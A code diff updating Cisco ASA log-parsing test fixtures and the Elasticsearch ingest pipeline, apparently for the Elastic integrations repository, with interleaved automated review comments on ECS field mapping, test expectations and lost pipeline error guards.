@@ -3258,7 +3258,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3336,7 +3336,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3376,7 +3376,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3416,7 +3416,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "net" @@ -3487,7 +3487,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3527,7 +3527,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "ecs": { "version": "8.11.0" }, @@ -3567,7 +3567,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:26.000Z", + "@timestamp": "2024-05-05T19:02:26.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3642,7 +3642,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -3695,7 +3695,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "destination_interface": "fw111", @@ -3771,7 +3771,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "destination_interface": "out111", @@ -3846,7 +3846,7 @@ ] }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -3905,7 +3905,7 @@ } }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" 
@@ -3964,7 +3964,7 @@ } }, { - "@timestamp": "2023-04-27T17:54:52.000Z", + "@timestamp": "2024-04-27T17:54:52.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -4023,7 +4023,7 @@ } }, { - "@timestamp": "2023-04-27T04:18:49.000Z", + "@timestamp": "2024-04-27T04:18:49.000Z", "destination": { "address": "10.20.30.40", "ip": "10.20.30.40" @@ -4082,7 +4082,7 @@ } }, { - "@timestamp": "2023-04-27T04:12:23.000Z", + "@timestamp": "2024-04-27T04:12:23.000Z", "cisco": { "asa": { "connection_id": "2751765169", @@ -4117,12 +4117,12 @@ ], "code": "302304", "duration": 3602000000000, - "end": "2023-04-27T04:12:23.000Z", + "end": "2024-04-27T04:12:23.000Z", "kind": "event", "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "reason": "Connection timeout", "severity": 6, - "start": "2023-04-27T03:12:21.000Z", + "start": "2024-04-27T03:12:21.000Z", "timezone": "UTC", "type": [ "connection", @@ -4187,7 +4187,7 @@ ] }, { - "@timestamp": "2023-04-27T02:02:02.000Z", + "@timestamp": "2024-04-27T02:02:02.000Z", "cisco": { "asa": { "destination_interface": "srv", @@ -4342,7 +4342,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4388,7 +4388,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "command_line_arguments": "'clear'" @@ -4448,7 +4448,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "privilege": { @@ -4463,7 +4463,7 @@ "event": { "action": "firewall-rule", "category": [ - "network" + "iam" ], "code": "502103", "kind": "event", @@ -4471,7 +4471,8 @@ "severity": 5, "timezone": "UTC", "type": [ - "info" + "group", + "change" ] }, "host": { 
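Review bot: The 502103 document (the record carrying `cisco.asa.privilege` in the `@@ -4448` hunk) now has `event.category: [iam]` and `event.type: [group, change]` while its `event.action` stays `firewall-rule`, which describes nothing about a privilege change and now contradicts the category. If 502103 is the user privilege-level change message, as the `privilege` object suggests, `event.type: [user, change]` is the closer ECS fit than `group`, since no group object is being modified. An explicit per-id `event.action` (something like `privilege-change`, constructed here) would also stop detection rules keyed on `event.action: firewall-rule` from treating an IAM event as a firewall hit; that set processor would live in the pipeline, outside this fixture.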
@@ -4504,7 +4505,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "FCD-FS-LAN" @@ -4576,7 +4577,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4634,7 +4635,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "FCD-FS-LAN" @@ -4708,7 +4709,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4766,7 +4767,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -4825,7 +4826,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "session_type": "LAN-to-LAN" @@ -4858,12 +4859,12 @@ ], "code": "113019", "duration": 1936000000000, - "end": "2023-04-27T02:03:03.000Z", + "end": "2024-04-27T02:03:03.000Z", "kind": "event", "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "reason": "User Requested", "severity": 4, - "start": "2023-04-27T01:30:47.000Z", + "start": "2024-04-27T01:30:47.000Z", "timezone": "UTC", "type": [ "connection", @@ -4907,7 +4908,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "assigned_ip": "192.168.50.5" @@ -4968,7 +4969,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "webvpn": { 
@@ -5041,7 +5042,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "webvpn": { @@ -5102,7 +5103,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "cisco": { "asa": { "destination_interface": "outside" @@ -5288,11 +5289,19 @@ }, "event": { "action": "drop", + "category": [ + "network" + ], "code": "434002", + "kind": "event", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "outcome": "unknown", "severity": 4, - "timezone": "UTC" + "timezone": "UTC", + "type": [ + "connection", + "denied" + ] }, "host": { "hostname": "dev01" @@ -5533,11 +5542,19 @@ }, "event": { "action": "created", + "category": [ + "network" + ], "code": "602303", + "kind": "event", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "outcome": "success", "severity": 6, - "timezone": "UTC" + "timezone": "UTC", + "type": [ + "connection", + "start" + ] }, "host": { "hostname": "dev01" @@ -6140,7 +6157,7 @@ ] }, { - "@timestamp": "2023-04-27T02:03:03.000Z", + "@timestamp": "2024-04-27T02:03:03.000Z", "ecs": { "version": "8.11.0" }, @@ -6493,7 +6510,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6546,7 +6563,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6599,7 +6616,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { @@ -6652,7 +6669,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "burst": { 
@@ -6705,7 +6722,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "aaa_type": "authentication" @@ -6780,7 +6797,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "aaa_type": "authorization" @@ -6855,7 +6872,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "rejection_reason": "AAA failure" @@ -6933,7 +6950,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "ecs": { "version": "8.11.0" }, @@ -6984,7 +7001,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "ecs": { "version": "8.11.0" }, @@ -7035,7 +7052,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "admin" @@ -7094,7 +7111,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "WebVPN" @@ -7153,7 +7170,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "Admin" @@ -7217,7 +7234,7 @@ ] }, { - "@timestamp": "2023-05-05T19:02:25.000Z", + "@timestamp": "2024-05-05T19:02:25.000Z", "cisco": { "asa": { "session_type": "WebVPN" diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log index d9be81e83dc..0eb093b252b 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log 
@@ -4,6 +4,10 @@ Oct 20 2019 15:42:54: %ASA-4-722037: Group User Aug 6 2020 11:01:37: %ASA-4-722037: Group User IP <234.63.56.32> SVC closing connection: Transport closing. Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <67.43.156.12> IPv4 Address <67.43.156.12> IPv6 address <::> assigned to session Oct 20 2021 16:41:52: %ASA-4-722011: Group User <464_0273> IP <192.168.0.1> SVC Message: 17/WARNING: Reconnecting the VPN tunnel.. +<190>Jan 24 2024 15:24:40 XYZhost1 : %ASA-6-722022: Group User IP <67.43.156.118> TCP SVC connection established without compression +<190>Jan 24 2024 15:25:23 XYZhost1 : %ASA-6-722023: Group User IP <81.2.69.142> UDP SVC connection terminated without compression +<190>Feb 21 2024 09:53:46 xxxxxx : %ASA-6-722022: Group MY-MFA User myuser@email.com IP 192.168.0.12 UDP SVC connection established without compression +<190>Feb 21 2024 09:55:01 xxxxxx: %ASA-6-722023: Group MGMT_Tunnel User my123.org.com IP 192.168.0.228 UDP SVC connection terminated without compression Oct 20 2021 16:41:52: %ASA-4-722033: Group User <464_0273> IP <192.168.0.1> First UDP SVC connection established for SVC session. Oct 20 2021 16:41:52: %ASA-5-722033: Group User <464_0273> IP <192.168.0.1> First TCP SVC connection established for SVC session. Oct 20 2021 16:41:52: %ASA-4-722034: Group User <464_0273> IP <192.168.0.1> New TCP SVC connection, no existing connection. diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json index b0a686cf667..dc9609fe8a9 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json 
@@ -378,6 +378,303 @@ "preserve_original_event" ] }, + { + "@timestamp": "2024-01-24T15:24:40.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722022", + "kind": "event", + "original": "<190>Jan 24 2024 15:24:40 XYZhost1 : %ASA-6-722022: Group User IP <67.43.156.118> TCP SVC connection established without compression", + "reason": "TCP SVC connection established without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "XYZhost1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "XYZhost1", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "XYZhost1", + "myorg.com" + ], + "ip": [ + "67.43.156.118" + ], + "user": [ + "src_user" + ] + }, + "source": { + "address": "67.43.156.118", + "as": { + "number": 35908 + }, + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": "67.43.156.118", + "user": { + "domain": "myorg.com", + "email": "src_user@myorg.com", + "group": { + "name": "MY-MFA" + }, + "name": "src_user" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-01-24T15:25:23.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722023", + "kind": "event", + "original": "<190>Jan 24 2024 15:25:23 XYZhost1 : %ASA-6-722023: Group User IP <81.2.69.142> UDP SVC connection terminated without compression", + "reason": "UDP SVC connection terminated without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "XYZhost1" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + 
"code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "XYZhost1", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "XYZhost1", + "myorg.com" + ], + "ip": [ + "81.2.69.142" + ], + "user": [ + "src_user" + ] + }, + "source": { + "address": "81.2.69.142", + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142", + "user": { + "domain": "myorg.com", + "email": "src_user@myorg.com", + "group": { + "name": "MGMT_Tunnel" + }, + "name": "src_user" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-02-21T09:53:46.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722022", + "kind": "event", + "original": "<190>Feb 21 2024 09:53:46 xxxxxx : %ASA-6-722022: Group MY-MFA User myuser@email.com IP 192.168.0.12 UDP SVC connection established without compression", + "reason": "UDP SVC connection established without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "xxxxxx" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "xxxxxx", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "xxxxxx", + "email.com" + ], + "ip": [ + "192.168.0.12" + ], + "user": [ + "myuser" + ] + }, + "source": { + "address": "192.168.0.12", + "ip": "192.168.0.12", + "user": { + "domain": "email.com", + "email": "myuser@email.com", + "group": { + "name": "MY-MFA" + }, + "name": "myuser" + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + 
"@timestamp": "2024-02-21T09:55:01.000Z", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "firewall-rule", + "category": [ + "network" + ], + "code": "722023", + "kind": "event", + "original": "<190>Feb 21 2024 09:55:01 xxxxxx: %ASA-6-722023: Group MGMT_Tunnel User my123.org.com IP 192.168.0.228 UDP SVC connection terminated without compression", + "reason": "UDP SVC connection terminated without compression", + "severity": 6, + "timezone": "UTC", + "type": [ + "info" + ] + }, + "host": { + "hostname": "xxxxxx" + }, + "log": { + "level": "informational", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 190, + "severity": { + "code": 6 + } + } + }, + "observer": { + "hostname": "xxxxxx", + "product": "asa", + "type": "firewall", + "vendor": "Cisco" + }, + "related": { + "hosts": [ + "xxxxxx" + ], + "ip": [ + "192.168.0.228" + ], + "user": [ + "my123.org.com" + ] + }, + "source": { + "address": "192.168.0.228", + "ip": "192.168.0.228", + "user": { + "group": { + "name": "MGMT_Tunnel" + }, + "name": "my123.org.com" + } + }, + "tags": [ + "preserve_original_event" + ] + }, { "@timestamp": "2021-10-20T16:41:52.000Z", "ecs": { diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json index fff51c462d4..58ab06e6df7 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-01-01T01:00:27.000Z", + "@timestamp": "2024-01-01T01:00:27.000Z", "ecs": { "version": "8.11.0" }, @@ -45,7 +45,7 @@ ] }, { - "@timestamp": "2023-01-01T01:00:30.000Z", + "@timestamp": "2024-01-01T01:00:30.000Z", "ecs": { "version": "8.11.0" }, 
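Review bot: The first two added documents (`XYZhost1`, codes 722022/722023) expect `source.user.name: "src_user"`, `source.user.email: "src_user@myorg.com"`, `source.user.group.name: "MY-MFA"` / `"MGMT_Tunnel"` and `myorg.com` in `related.hosts`, yet their `event.original` (`Group User IP <…>`) carries an empty group and user, so none of these values are derivable from the input line. Unless a test config injects them, this fixture locks in a pipeline that attributes a VPN session to a user and group that never appeared in the log, which is the wrong failure mode for an identity-bearing event; confirm where the values come from before accepting the regenerated expectation. The last two documents, whose group and user are present in the line, look consistent with their input.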
@@ -86,7 +86,7 @@ ] }, { - "@timestamp": "2023-01-01T01:02:12.000Z", + "@timestamp": "2024-01-01T01:02:12.000Z", "cisco": { "asa": { "source_interface": "eth0" diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json index 0edeb8dbe86..382072c0069 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-non-canonical.log-expected.json @@ -1,7 +1,7 @@ { "expected": [ { - "@timestamp": "2023-07-15T13:38:14.000Z", + "@timestamp": "2024-07-15T13:38:14.000Z", "cisco": { "asa": { "connection_id": "3263493120", @@ -81,7 +81,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:11.000Z", + "@timestamp": "2024-07-15T13:38:11.000Z", "cisco": { "asa": { "connection_id": "3263492189", @@ -165,7 +165,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:08.000Z", + "@timestamp": "2024-07-15T13:38:08.000Z", "cisco": { "asa": { "connection_id": "743108828", @@ -249,7 +249,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:03.000Z", + "@timestamp": "2024-07-15T13:38:03.000Z", "cisco": { "asa": { "connection_id": "743108738", @@ -333,7 +333,7 @@ ] }, { - "@timestamp": "2023-07-15T13:36:59.000Z", + "@timestamp": "2024-07-15T13:36:59.000Z", "cisco": { "asa": { "source_interface": "SH_INFRA_MGT" @@ -403,7 +403,7 @@ ] }, { - "@timestamp": "2023-07-15T13:36:39.000Z", + "@timestamp": "2024-07-15T13:36:39.000Z", "cisco": { "asa": { "source_interface": "outside" @@ -491,7 +491,7 @@ ] }, { - "@timestamp": "2023-07-15T13:38:47.000Z", + "@timestamp": "2024-07-15T13:38:47.000Z", "cisco": { "asa": { "destination_interface": "outside", 
@@ -525,11 +525,11 @@ ], "code": "305012", "duration": 41000000000, - "end": "2023-07-15T13:38:47.000Z", + "end": "2024-07-15T13:38:47.000Z", "kind": "event", "original": "Jul 15 13:38:47 216.160.83.56 : %ASA-6-305012: Teardown dynamic UDP translation from SERVERS:exp-wait/62409 to outside:81.2.69.142/62409 duration 0:00:41", "severity": 6, - "start": "2023-07-15T13:38:06.000Z", + "start": "2024-07-15T13:38:06.000Z", "timezone": "UTC", "type": [ "connection", @@ -581,7 +581,7 @@ ] }, { - "@timestamp": "2023-07-15T13:37:33.000Z", + "@timestamp": "2024-07-15T13:37:33.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -615,11 +615,11 @@ ], "code": "305012", "duration": 30000000000, - "end": "2023-07-15T13:37:33.000Z", + "end": "2024-07-15T13:37:33.000Z", "kind": "event", "original": "Jul 15 13:37:33 216.160.83.56 : %ASA-6-305012: Teardown dynamic UDP translation from SERVERS:exp-wait/56421 to outside:81.2.69.142/56421 duration 0:00:30", "severity": 6, - "start": "2023-07-15T13:37:03.000Z", + "start": "2024-07-15T13:37:03.000Z", "timezone": "UTC", "type": [ "connection", @@ -671,7 +671,7 @@ ] }, { - "@timestamp": "2023-07-15T13:39:04.000Z", + "@timestamp": "2024-07-15T13:39:04.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -757,7 +757,7 @@ ] }, { - "@timestamp": "2023-07-15T13:37:02.000Z", + "@timestamp": "2024-07-15T13:37:02.000Z", "cisco": { "asa": { "destination_interface": "outside", @@ -843,7 +843,7 @@ ] }, { - "@timestamp": "2023-07-15T13:18:06.000Z", + "@timestamp": "2024-07-15T13:18:06.000Z", "cisco": { "asa": { "destination_interface": "SH_OSS", @@ -938,7 +938,7 @@ ] }, { - "@timestamp": "2023-07-15T01:18:01.000Z", + "@timestamp": "2024-07-15T01:18:01.000Z", "cisco": { "asa": { "destination_interface": "SH_OSS", @@ -1033,7 +1033,7 @@ ] }, { - "@timestamp": "2023-07-15T13:30:09.000Z", + "@timestamp": "2024-07-15T13:30:09.000Z", "cisco": { "asa": { "icmp_code": 0, 
@@ -1108,7 +1108,7 @@ ] }, { - "@timestamp": "2023-07-14T01:45:09.000Z", + "@timestamp": "2024-07-14T01:45:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1183,7 +1183,7 @@ ] }, { - "@timestamp": "2023-07-15T13:30:09.000Z", + "@timestamp": "2024-07-15T13:30:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1258,7 +1258,7 @@ ] }, { - "@timestamp": "2023-07-14T01:45:09.000Z", + "@timestamp": "2024-07-14T01:45:09.000Z", "cisco": { "asa": { "icmp_code": 0, @@ -1333,7 +1333,7 @@ ] }, { - "@timestamp": "2023-07-15T12:18:51.000Z", + "@timestamp": "2024-07-15T12:18:51.000Z", "ecs": { "version": "8.11.0" }, @@ -1408,7 +1408,7 @@ ] }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "ecs": { "version": "8.11.0" }, @@ -1480,7 +1480,7 @@ ] }, { - "@timestamp": "2023-06-14T01:22:47.000Z", + "@timestamp": "2024-06-14T01:22:47.000Z", "destination": { "address": "mirror", "domain": "mirror" @@ -1540,7 +1540,7 @@ } }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "cisco": { "asa": { "rejection_reason": "AAA failure" @@ -1636,7 +1636,7 @@ ] }, { - "@timestamp": "2023-07-01T09:27:13.000Z", + "@timestamp": "2024-07-01T09:27:13.000Z", "cisco": { "asa": { "rejection_reason": "Account has been disabled" diff --git a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml index c2cc4dd717f..cf60404992e 100644 --- a/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_asa/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
@@ -1,21 +1,27 @@ --- description: "Pipeline for Cisco ASA logs" processors: - - rename: + - set: + field: event.original + copy_from: message + - remove: field: message - target_field: event.original - tag: "rename_message" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - ignore_missing: true - if: ctx.event?.original == null - set: field: ecs.version value: '8.11.0' + - set: + field: event.kind + value: event + - set: + field: event.category + value: [ network ] + - set: + field: event.type + value: [ info ] + - set: + field: event.action + value: firewall-rule + # # Parse the syslog header # @@ -23,7 +29,7 @@ processors: # from the header and stores the message contents in _temp_.full_message. - grok: field: event.original - tag: "grok_event_original" + tag: grok_event_original if: ctx.event?.original != null patterns: - "(?:%{SYSLOG_HEADER})?\\s*%{GREEDYDATA:_temp_.full_message}" @@ -41,15 +47,9 @@ processors: # exactly match the syntax for firepower management logs PROCESS_HOST: "(?:%{PROCESS:process.name}:\\s%{SYSLOGHOST:host.name})" HOST_PROCESS: "(?:%{SYSLOGHOST:host.hostname}:?\\s+)?(?:%{PROCESS:process.name}?(?:\\[%{POSINT:process.pid:long}\\])?)?" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" - script: lang: painless - tag: "script_log_syslog" + tag: script_log_syslog source: | if (ctx.log?.syslog?.priority != null) { def severity = new HashMap(); 
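Review bot: The `message` → `event.original` step loses its guards in the first hunk: the old `rename` carried `ignore_missing: true` and `if: ctx.event?.original == null`, while the new `set … copy_from: message` and `remove: field: message` appear to run unconditionally and without `ignore_missing`, so, if I read the collapsed hunk right, a document that arrives without `message` now fails the pipeline where it previously passed through, and a document that already has `event.original` has it silently overwritten. The later grok still tests `if: ctx.event?.original != null`, which this change makes effectively dead. Keeping the old semantics is three lines: `if: ctx.event?.original == null` and `ignore_empty_value: true` on the `set`, and `ignore_missing: true` on the `remove`.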
@@ -59,10 +59,6 @@ processors: facility['code'] = ctx.log.syslog.priority>>3; ctx.log.syslog['facility'] = facility; } - on_failure: - - append: - field: error.message - value: "Processor {{{ _ingest.on_failure_processor_type }}} with tag {{{ _ingest.on_failure_processor_tag }}} in pipeline {{{ _ingest.on_failure_pipeline }}} failed with message: {{{ _ingest.on_failure_message }}}" # # Parse FTD/ASA style message @@ -71,7 +67,7 @@ processors: - grok: field: _temp_.full_message if: ctx._temp_?.full_message != null - tag: "grok_full_message" + tag: grok_full_message patterns: - "%{FTD_PREFIX}-(?:%{FTD_SUFFIX:_temp_.cisco.suffix}-)?%{NONNEGINT:event.severity:int}-%{POSINT:_temp_.cisco.message_id}?:?\\s*%{GREEDYDATA:message}" # Before version 6.3, messages for connection, security intelligence, and intrusion events didn't include an event type ID in the message header. @@ -80,12 +76,6 @@ processors: FTD_SUFFIX: "[^0-9-]+" # Before version 6.3, FTD used ASA prefix in syslog messages FTD_PREFIX: "%{DATA}%(?:[A-Z]+)" - on_failure: - - append: - field: error.message - value: "fail-{{{ _ingest.on_failure_processor_tag }}}" - - fail: - message: "Processor {{ _ingest.on_failure_processor_type }} with tag {{ _ingest.on_failure_processor_tag }} in pipeline {{ _ingest.on_failure_pipeline }} failed with message: {{ _ingest.on_failure_message }}" # # Create missing fields when no %FTD label is present @@ -179,10 +169,6 @@ processors: - "MMM dd yyyy HH:mm:ss z" - "EEE MMM d yyyy HH:mm:ss z" - "EEE MMM dd yyyy HH:mm:ss z" - on_failure: - - append: - field: error.message - value: "{{{ _ingest.on_failure_message }}}" # # Set log.level 
